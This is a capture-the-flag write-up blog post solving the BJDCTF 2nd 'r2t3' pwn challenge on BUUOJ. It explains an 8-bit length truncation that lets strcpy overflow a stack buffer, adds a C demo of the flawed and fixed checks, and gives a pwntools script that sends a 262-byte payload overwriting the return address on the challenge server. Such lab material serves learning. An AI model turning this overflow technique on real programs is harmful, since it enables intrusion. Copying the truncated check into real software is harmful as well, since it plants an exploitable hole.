CTF-Pwn-[BJDCTF 2nd] r2t3

Blog description

The information in this article comes from material collected on the Internet and from my own notes; it is a personal learning and experience summary. If anything infringes your rights, please contact me and I will delete it, thank you! This article is only for learning and exchange, not for illegal use!

CTF platform

Website

https://buuoj.cn/challenges

Challenge

Pwn category, [BJDCTF 2nd] r2t3

Download the challenge file

r2t3

Approach

Run the file command on the binary: it is a 32-bit ELF, so open it with the 32-bit IDA.

Go to the main function and decompile it with F5

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+0h] [ebp-408h]

  my_init();
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("[+]Ret2text3.0?");
  puts("[+]Please input your name:");
  read(0, &buf, 0x400u);
  name_check(&buf);
  puts("Welcome ,u win!");
  return 0;
}

The first step is to determine whether any buffer can overflow.

The first thing we see is &buf. Double-click it to check its size: buf sits at ebp-408h and read() reads at most 0x400 bytes, so there is no overflow here.

There must be a flaw somewhere in this challenge, so look at the name_check function next. You can open it the same way, by double-clicking it.

char *__cdecl name_check(char *s)
{
  char dest; // [esp+7h] [ebp-11h]
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  printf("Hello,My dear %s", s);
  return strcpy(&dest, s);
}

From the code above you can tell this is an integer overflow. strlen(s) returns a size_t, but it is stored in v3, an unsigned __int8, so the length is truncated to its low 8 bits (reduced modulo 256). A name of, say, 262 bytes is seen by the check as 6, which passes the 3 < v3 <= 8 test, and strcpy then copies the whole 262 bytes into dest. dest lives at ebp-11h, so 0x11 bytes of padding reach the saved ebp and 4 more reach the saved return address, which is exactly the 0x11+0x4 offset used in the script below.
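As an added illustration (my own code, not part of the challenge binary or the original post), the following C program reproduces the length check from name_check beside a corrected version that keeps the full size_t and bounds the length by the destination size. DEST_SIZE is taken from the decompiled output (dest at ebp-11h); the test names are constructed inputs.

```c
#include <stdio.h>
#include <string.h>

/* Size of dest in name_check(): it sits at ebp-0x11, so 0x11 bytes separate
 * it from the saved ebp (value taken from the decompiled output above). */
#define DEST_SIZE 0x11

/* Mirrors the binary's check: strlen() is stored in an 8-bit unsigned,
 * so the real length is reduced modulo 256 before the range test.
 * Returns 1 if the name is accepted, 0 if it is rejected. */
int vulnerable_check_accepts(const char *s)
{
    unsigned char v3 = (unsigned char)strlen(s);  /* 262 becomes 6 here */
    if (v3 <= 3u || v3 > 8u)
        return 0;
    return 1;
}

/* Hardened form: keep the full size_t and tie the upper bound to the
 * destination buffer, so a later strcpy() can never run past dest. */
int fixed_check_accepts(const char *s)
{
    size_t len = strlen(s);
    if (len <= 3 || len > 8 || len + 1 > DEST_SIZE)
        return 0;
    return 1;
}

/* Constructed input: a name made of n 'a' characters (n < 1024). */
static char g_name[1024];
const char *make_name(size_t n)
{
    if (n >= sizeof g_name)
        n = sizeof g_name - 1;
    memset(g_name, 'a', n);
    g_name[n] = '\0';
    return g_name;
}

int main(void)
{
    size_t lens[] = { 5, 256, 262, 300 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        const char *s = make_name(lens[i]);
        printf("len=%3zu  binary check: %s  fixed check: %s\n", lens[i],
               vulnerable_check_accepts(s) ? "accept" : "reject",
               fixed_check_accepts(s) ? "accept" : "reject");
    }
    return 0;
}
```

Running it shows that the binary's check accepts a 262-byte name (truncated to 6) while rejecting 256 (truncated to 0) and 300 (truncated to 44); the fixed check accepts only genuinely short names.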

Install LibcSearcher Library

git clone https://github.com/lieanu/LibcSearcher.git

cd LibcSearcher

python setup.py install

Write a script

Python3

#coding=utf-8
from pwn import *
p=remote('node3.buuoj.cn',29748)

p.recvuntil("name:")
# 0x11 bytes fill dest up to the saved ebp, 4 more cover the saved ebp,
# then the return address chosen by the author follows
payload=(0x11+0x4)*b'a'+p32(0x0804858B)
# pad to 262 bytes: strlen() is truncated to 8 bits, 262 mod 256 = 6,
# which passes the 3 < len <= 8 check
payload=payload.ljust(262,b'a')
p.sendline(payload)

p.interactive()

Note the difference between Python versions: Python 3 requires the b prefix in front of byte strings, otherwise an error is reported.

Test

Then run the script against the remote service

The flag is printed

Thanks

BUUCTF

And my own hard work

Tags: Programming Python git github

Posted on Wed, 06 May 2020 08:15:48 -0700 by poknam